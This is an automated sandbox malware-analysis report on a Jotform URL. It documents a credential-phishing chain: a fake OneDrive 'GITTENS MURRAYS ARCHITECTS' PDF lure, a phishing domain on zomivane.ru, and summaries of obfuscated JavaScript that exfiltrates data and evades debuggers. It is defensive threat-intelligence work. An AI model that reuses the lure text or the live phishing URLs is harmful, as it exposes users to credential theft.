Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://eu.jotform.com/app/250092704521347

Overview

General Information

Sample URL:https://eu.jotform.com/app/250092704521347
Analysis ID:1587498
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Phishing site or detected (based on various text indicators)
Detected hidden input values containing email addresses (often used in phishing pages)
Drops files with a non-matching file extension (content does not match file extension)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 2388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 5732 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1960,i,13832150121213406412,16672036579387046635,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 6608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://eu.jotform.com/app/250092704521347" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://dm9h.zomivane.ru/favicon.icoAvira URL Cloud: Label: phishing
Source: https://dm9h.zomivane.ru/oIZnEw3n/)Avira URL Cloud: Label: phishing

Phishing

barindex
Source: https://eu.jotform.com/app/250092704521347Joe Sandbox AI: Page contains button: 'Download' Source: '1.3.pages.csv'
Source: https://eu.jotform.com/app/250092704521347Joe Sandbox AI: Page contains button: 'DOWNLOAD GITTENS MURRAYS ARCHITECTS.pdf' Source: '1.2.pages.csv'
Source: file:///C:/Users/user/Downloads/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdfJoe Sandbox AI: Page contains button: 'CLICK ON DOWNLOAD TO SEE YOUR DOCUMENT' Source: '2.6.pages.csv'
Source: file:///C:/Users/user/Downloads/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdfJoe Sandbox AI: Page contains button: 'CLICK ON DOWNLOAD TO SEE YOUR DOCUMENT' Source: '2.9.pages.csv'
Source: 0.26.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://dm9h.zomivane.ru/oIZnEw3n/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. It collects user data and sends it to an untrusted domain, and also attempts to bypass form submission. Overall, the script demonstrates malicious intent and poses a significant security risk.
Source: 0.24.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://dm9h.zomivane.ru/oIZnEw3n/... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While the script may have some legitimate functionality, the overall risk level is high due to the presence of these malicious indicators.
Source: 0.25.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://dm9h.zomivane.ru/oIZnEw3n/... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The script also includes an interval-based debugger trap that could be used to detect and prevent analysis. Overall, this script demonstrates a high level of malicious intent and should be considered a significant security risk.
Source: 0.70.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://dm9h.zomivane.ru/oIZnEw3n/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and URLs further increases the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
Source: 0.72.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://dm9h.zomivane.ru/oIZnEw3n/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which could be part of a phishing attempt. Overall, the script demonstrates highly suspicious and potentially malicious behavior.
Source: 0.71.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://dm9h.zomivane.ru/oIZnEw3n/... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common developer tools and keyboard shortcuts, and redirecting the user to a suspicious domain. The script also includes obfuscated code and a mechanism to detect and respond to debugger activity, which are strong indicators of malicious intent.
Source: Chrome DOM: 2.9OCR Text: DOWNLOAD GITTENS MURRAYS ARCHITECTS.678101120618b4... Click Review OR Download to access this document that was shared with you. GITTENS MURRAY ARCHITECTS Gittens Murray Architects Ltd PDF CLICK ON DOWNLOAD TO SEE YOUR DOCUMENT Microsoft OneDrive Microsoft respects your privacy. To learn more, please read our Privacy Statement- Microsoft Corporation, One Microsoft Way, Redmond, WA 98052
Source: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&x-client-SKU=ID_NET8_0&x-client-Ver=7.5.1.0&uaid=0a66f3c0384e4d088350ad68ffaa2658&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABDgEAAABVrSpeuWamRam2jAF1XRQEfzsPw65FDdcvSoaMNkfFQz1vP_ABnxf6i1YiR8g4z2FQzip3f9oP8EL6zmDDxbMRj10Q6LGQ3jlca3IxKC9pt1Oq6f66abGk-Er-5pIZrdIERCtPh5P9PNpMMoaRIjGxxAP2uM1bqtqsqjFVVg6RsGEtDUp6HqUaiyiWE8s-BoKJWGhiipbc8_dxz9T7rbaZ_GR8KmygRUpqpV3Xv4zXxiAA&jshs=2&jsh=&jshp=&username=no%40thankyou.com&login_hint=no%40thankyou.comHTTP Parser: no@thankyou.com
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&ui_locales=en-US&mkt=en-US&client-request-id=0a66f3c0-384e-4d08-8350-ad68ffaa2658&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&ui_locales=en-US&mkt=en-US&client-request-id=0a66f3c0-384e-4d08-8350-ad68ffaa2658&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&x-client-SKU=ID_NET8_0&x-client-Ver=7.5.1.0&uaid=0a66f3c0384e4d088350ad68ffaa2658&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABDgEAAABVrSpeuWamRam2jAF1XRQEfzsPw65FDdcvSoaMNkfFQz1vP_ABnxf6i1YiR8g4z2FQzip3f9oP8EL6zmDDxbMRj10Q6LGQ3jlca3IxKC9pt1Oq6f66abGk-Er-5pIZrdIERCtPh5P9PNpMMoaRIjGxxAP2uM1bqtqsqjFVVg6RsGEtDUp6HqUaiyiWE8s-BoKJWGh...HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&ui_locales=en-US&mkt=en-US&client-request-id=0a66f3c0-384e-4d08-8350-ad68ffaa2658&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 3c89faf2-1412-4b68-a7fa-af581ade3eb7e8614673-383b-4a74-95be-52c428b6b2fe
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&ui_locales=en-US&mkt=en-US&client-request-id=0a66f3c0-384e-4d08-8350-ad68ffaa2658&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&ui_locales=en-US&mkt=en-US&client-request-id=0a66f3c0-384e-4d08-8350-ad68ffaa2658&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&x-client-SKU=ID_NET8_0&x-client-Ver=7.5.1.0&uaid=0a66f3c0384e4d088350ad68ffaa2658&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABDgEAAABVrSpeuWamRam2jAF1XRQEfzsPw65FDdcvSoaMNkfFQz1vP_ABnxf6i1YiR8g4z2FQzip3f9oP8EL6zmDDxbMRj10Q6LGQ3jlca3IxKC9pt1Oq6f66abGk-Er-5pIZrdIERCtPh5P9PNpMMoaRIjGxxAP2uM1bqtqsqjFVVg6RsGEtDUp6HqUaiyiWE8s-BoKJWGh...HTTP Parser: Title: Sign in to your Microsoft account does not match URL
Source: https://login.live.com/ppsecure/post.srf?username=no%40thankyou.com&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&contextid=626942586871851E&opid=0DD084C48460AD43&bk=1736512653&uaid=0a66f3c0384e4d088350ad68ffaa2658&pid=15216HTTP Parser: Title: Sign in to your Microsoft account does not match URL
Source: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&x-client-SKU=ID_NET8_0&x-client-Ver=7.5.1.0&uaid=0a66f3c0384e4d088350ad68ffaa2658&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABDgEAAABVrSpeuWamRam2jAF1XRQEfzsPw65FDdcvSoaMNkfFQz1vP_ABnxf6i1YiR8g4z2FQzip3f9oP8EL6zmDDxbMRj10Q6LGQ3jlca3IxKC9pt1Oq6f66abGk-Er-5pIZrdIERCtPh5P9PNpMMoaRIjGxxAP2uM1bqtqsqjFVVg6RsGEtDUp6HqUaiyiWE8s-BoKJWGh...HTTP Parser: Iframe src: https://fpt.live.com?session_id=0a66f3c0384e4d088350ad68ffaa2658&CustomerId=33e01921-4d64-4f8c-a055-5bdaffd5e33d&PageId=SI
Source: https://login.live.com/ppsecure/post.srf?username=no%40thankyou.com&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&contextid=626942586871851E&opid=0DD084C48460AD43&bk=1736512653&uaid=0a66f3c0384e4d088350ad68ffaa2658&pid=15216HTTP Parser: Iframe src: https://fpt.live.com?session_id=0a66f3c0384e4d088350ad68ffaa2658&CustomerId=33e01921-4d64-4f8c-a055-5bdaffd5e33d&PageId=SI
Source: https://login.live.com/ppsecure/post.srf?username=no%40thankyou.com&client_id=4765445b-32c6-49b0-83e6-1d93765276ca&contextid=626942586871851E&opid=0DD084C48460AD43&bk=1736512653&uaid=0a66f3c0384e4d088350ad68ffaa2658&pid=15216HTTP Parser: Iframe src: https://fpt.live.com?session_id=0a66f3c0384e4d088350ad68ffaa2658&CustomerId=33e01921-4d64-4f8c-a055-5bdaffd5e33d&PageId=SI
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&ui_locales=en-US&mkt=en-US&client-request-id=0a66f3c0-384e-4d08-8350-ad68ffaa2658&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&x-client-SKU=ID_NET8_0&x-client-Ver=7.5.1.0&uaid=0a66f3c0384e4d088350ad68ffaa2658&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABDgEAAABVrSpeuWamRam2jAF1XRQEfzsPw65FDdcvSoaMNkfFQz1vP_ABnxf6i1YiR8g4z2FQzip3f9oP8EL6zmDDxbMRj10Q6LGQ3jlca3IxKC9pt1Oq6f66abGk-Er-5pIZrdIERCtPh5P9PNpMMoaRIjGxxAP2uM1bqtqsqjFVVg6RsGEtDUp6HqUaiyiWE8s-BoKJWGh...HTTP Parser: <input type="password" .../> found
Source: file:///C:/Users/user/Downloads/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdfHTTP Parser: No favicon
Source: file:///C:/Users/user/Downloads/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdfHTTP Parser: No favicon
Source: file:///C:/Users/user/Downloads/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdfHTTP Parser: No favicon
Source: https://dm9h.zomivane.ru/oIZnEw3n/HTTP Parser: No favicon
Source: https://dm9h.zomivane.ru/oIZnEw3n/HTTP Parser: No favicon
Source: https://dm9h.zomivane.ru/oIZnEw3n/HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&ui_locales=en-US&mkt=en-US&client-request-id=0a66f3c0-384e-4d08-8350-ad68ffaa2658&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.live.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code+id_token&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&x-client-SKU=ID_NET8_0&x-client-Ver=7.5.1.0&uaid=0a66f3c0384e4d088350ad68ffaa2658&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABDgEAAABVrSpeuWamRam2jAF1XRQEfzsPw65FDdcvSoaMNkfFQz1vP_ABnxf6i1YiR8g4z2FQzip3f9oP8EL6zmDDxbMRj10Q6LGQ3jlca3IxKC9pt1Oq6f66abGk-Er-5pIZrdIERCtPh5P9PNpMMoaRIjGxxAP2uM1bqtqsqjFVVg6RsGEtDUp6HqUaiyiWE8s-BoKJWGh...HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&ui_locales=en-US&mkt=en-US&client-request-id=0a66f3c0-384e-4d08-8350-ad68ffaa2658&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721094077414818.M2M4OWZhZjItMTQxMi00YjY4LWE3ZmEtYWY1ODFhZGUzZWI3ZTg2MTQ2NzMtMzgzYi00YTc0LTk1YmUtNTJjNDI4YjZiMmZl&ui_locales=en-US&mkt=en-US&client-request-id=0a66f3c0-384e-4d08-8350-ad68ffaa2658&state=O1vc0JqwNybO-GeWx6IjZlOVTZMJ5AN_PYDQHg-y3NMSDzzH7WF0bPahTMMMUt2I-Nh0lrw4d8rywqBIcEUu7sq07YgEGgULq358cfy1eQ66AIltofa13XxLF3mT-KqSB7e5elaHaHHrnabO85bEemqGiH7GOXsLRNRwSUbgA0d4ocSXPG1Ed-uIPSgRSshOD3bxLulelWO5D_yGOB-hyMfqwwAWBN5a211X5aBOdQ9uZ6fYiwiKoXfTEYExvW4xWDqTwtS_mPowiBAn2AW_gA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
